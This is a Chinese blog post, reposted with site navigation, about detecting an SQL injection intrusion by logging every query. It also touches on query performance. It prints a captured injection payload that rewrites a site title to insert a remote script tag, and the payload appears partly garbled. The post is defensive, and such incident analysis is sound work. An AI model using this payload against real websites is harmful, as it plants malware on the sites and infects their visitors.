位置: 编程技术 - 正文

记一次成功的sql注入入侵检测附带sql性能优化(记一次成功的喜悦作文)

编辑:rootadmin
但是如果是让你接手一个二等残废的网站,并让你在上面改版,而且不能推翻式改版,只能逐步替换旧的程序,那么你会非常痛苦,例如我遇到的问题: 问题1. 老板对你说,以前刚做完网站好好了,没有出现木马,怎么你来了,就会出现木马,先别说了,赶紧解决问题,我彻底无语,但是如果争吵,其实证明你和老板一样无知,拿出证据和事实分析来让公司其他稍微懂技术的一起来证明,公司网站被挂马不是你来了的错。 如是我通过网站目录仔细排查将通过fck上传的网马删除并修补fck的上传漏洞并记下了这篇 Fckeditor使用笔记 ,其实很多人都遇到过,也解决过,都是小问题,但是让你老板明白比解决漏洞问题更蛋疼,我那解释的叫一个汗啊,恨不得把公司所有稍微懂点技术的都叫上让他们看什么是大马什么是小马,然后演示怎么上传木马,奶奶的,黑客教程普及啊。 问题2. 网站又出现问题,上次的问题解决了不过两个月,网站又被入侵挂马,如是老板这次再说因为我来了才出问题,立马走人,这就是为什么不能更不懂技术的人硬碰硬,更不能和你的老板来说,说了你又不懂。 但是要命的是网站是以前的技术开发的二等残废,在别个的cms上修改的,我必须保证网站在的开发的同时旧的模块还可以使用,通过逐步更新的方法将网站底层翻新,但是那么多页面,你很难一个一个去检测那个页面有漏洞,如是写出下面的检测代码,没想到这么简单的就搞定了,并且可以通过此方法优化你的sql。 第一步建立一个sql日志表 记录sql语句、此sql语句被执行次数,参数及值,记录开始时间,结束时间,来自哪个页面,ip和此条语句执行时间(暂时没用) 第二步在sqlhelper里写记录代码 两个方法本来可以写成private的,但是此二等残废的网站其他地方用的别的sqlhelper类,就直接调用此处通过合理优化的sqlhelper类的方法了。 代码1:插入日志 代码2:判断此条sql是否存在 第三部在你的每个执行sql语句的方法里加入以下代码,不管是ExecuteScalar、ExecuteReader还是ExecuteNonQuery等等都加上 代码示例:

然后你会发现入侵的入口被记录下来了,后面方框里的就是构造注入的sql

构造sql如下: +update+my_websetting+set+websitetitle=REPLACE(cast(websitetitle+as+varchar()),cast(char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+as+varchar()),cast(char()+as+varchar(8)))-- 转码后变成这样了:   update my_websetting set websitetitle=REPLACE(cast(websitetitle as varchar()),websitetitle+'</title><script src= 这个就是木马地址,没事你就别点了,好奇害死猫。 小结: 既然知道入口就知道怎么补救了吧,把string类型该过滤的都过滤掉,int类型的就得是int类型,别让数据库替你隐式转。通过此sql日志记录,你应该发现一点那个hit还是有点价值的。 通过select top * from my_sqllog order by hit desc 你会发现你写的那么多sql原来真垃圾,在条件允许的情况下干嘛不把它放到缓存里。所以后来我写的sql基本不在这top 里。 抛砖引玉,望高手批评,以上入侵方法希望刚学习做程序员的同学不要用来欺负小网站,伤不起。 作者:jqbird

推荐整理分享记一次成功的sql注入入侵检测附带sql性能优化(记一次成功的喜悦作文),希望有所帮助,仅作参考,欢迎阅读内容。

记一次成功的sql注入入侵检测附带sql性能优化(记一次成功的喜悦作文)

文章相关热门搜索词:记一次成功的尝试作文600字,记一次成功的经历作文400字,记一次成功的经历和感受,记一次成功的尝试作文450字,记一次成功的尝试作文600字,记一次成功的相亲 馒头,记一次成功的尝试作文450字,记一次成功的尝试作文450字,内容如对您有帮助,希望把文章链接给更多的朋友!

sqlserver中在指定数据库的所有表的所有列中搜索给定的值 比如:我们导入了某个客户的资料,我们知道此客户的姓名是ZhangShan,我们想知道,在我们的业务数据库(eg:NorthWind)中,有哪些数据表的哪些字段设置了

mssql server 数据库附加不上解决办法分享 错误,从网上找了一些解决方案,一般都是说文件的权限不足的问题,当然附加的时候必须是有数据库附加权限才可以操作的。解决办法1:给相应

在数据库‘master’中拒绝CREATE DATABASE权限问题的解决方法 publicpartialclassCMS_DBDataContext{partialvoidOnCreated(){//如果数据库不存在则创建数据库if(!this.DatabaseExists()){this.CreateDatabase();}}}遇到了以下错误:在数据库‘master

标签: 记一次成功的喜悦作文

本文链接地址:https://www.jiuchutong.com/biancheng/348852.html 转载请保留说明!

上一篇:根据表名和索引获取需要的列名的存储过程(根据索引名称查字段)

下一篇:sqlserver中在指定数据库的所有表的所有列中搜索给定的值(在sql server)

  • 如何办理车辆购置置换补贴手续
  • 退税进度显示国库退库失败怎么办 是什么原因
  • 装修费用应该计入什么科目
  • 企业付房租怎么做会计分录
  • 停车费定额发票税率
  • 小规模纳税人收到专票后如何处理
  • 出口退税增值税账务处理
  • 结转存货跌价准备冲减主营业务成本
  • 临时人员劳务费有哪些?
  • 企业所得税资产总额怎么算出来的呢
  • 小规模纳税人汇算清缴要填什么表
  • 支付技术转让费能加计扣除
  • 转账支票遗失能挂失吗
  • 海关证需要年检吗
  • 老板向公司借款用于公司经营
  • 个体工商户怎么注册
  • 新公司开业的祝福语
  • 财务部门固定资产修理费计入什么科目
  • 企业年检网上申报时间
  • 速冻食品增值税税率
  • 应交增值税出口退税年末如何结转?
  • 认购价和发行价的差价
  • 财务费用余额在借方是正数还是负数
  • 应付职工薪酬核算内容不包括
  • 如何修改mac系统密码
  • 固定资产报废怎么处理
  • 股权和债权转让的关系
  • 分配结转本月发出材料成本会计分录
  • php生成代码
  • p指针后移的语句
  • PHP:imagetypes()的用法_GD库图像处理函数
  • 商品流通企业会计分录
  • uniapp 信息推送
  • php实战
  • 工业企业成本怎么结转
  • php实现的加密解决方案
  • 微前端Qiankun
  • php技术和mysql怎么结合
  • 注意!PHP 7中不要做的10件事
  • 现代服务业主要功能
  • 发票收件人信息
  • 为什么增值税发票不能折叠?
  • java自增自减运算符的规则
  • 有净残值的固定资产如何折旧
  • 公司吸收合并流程详细步骤
  • 什么叫利得
  • 冲抵货款是什么意思
  • 我国会计制度对会计要求
  • ukey要交服务费吗
  • 负数发票作废后对原发票有影响吗
  • 防伪税控开票系统SOAP服务端
  • 金税盘服务费可以退吗
  • 农产品收购单怎么做会计分录
  • 融资租赁固定资产的账务处理实例
  • 建账的要点及应注意的问题
  • windows无法启动MySQL80服务
  • win7系统最佳性能
  • win10预览版21277下载
  • 搜狗拼音输入法xp系统
  • 在苹果电脑上怎么下载软件
  • CentOS 6.2(32位/64位) 安装步骤图文详解
  • win7开机出现标志后就重启
  • mac adobe flash player一直提示更新
  • Windows7 64位系统如何添加打印机图文教程
  • Linux系统中配置网络
  • js深拷贝的三种实现方式
  • python之virtualenv的简单使用方法(必看篇)
  • node的全局变量有哪些
  • python编程完全入门教程
  • 轻松实现财富自由
  • unable to instantiate decoder
  • under code
  • js面向对象写法
  • bootstrap基础教程
  • 国家税务总局使用
  • 所得税季度预缴,年度汇算清缴
  • 授课费800元个税要收吗
  • 工会经费管理办法2021
  • 河南省国家税务局官网
  • 山东地税app
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设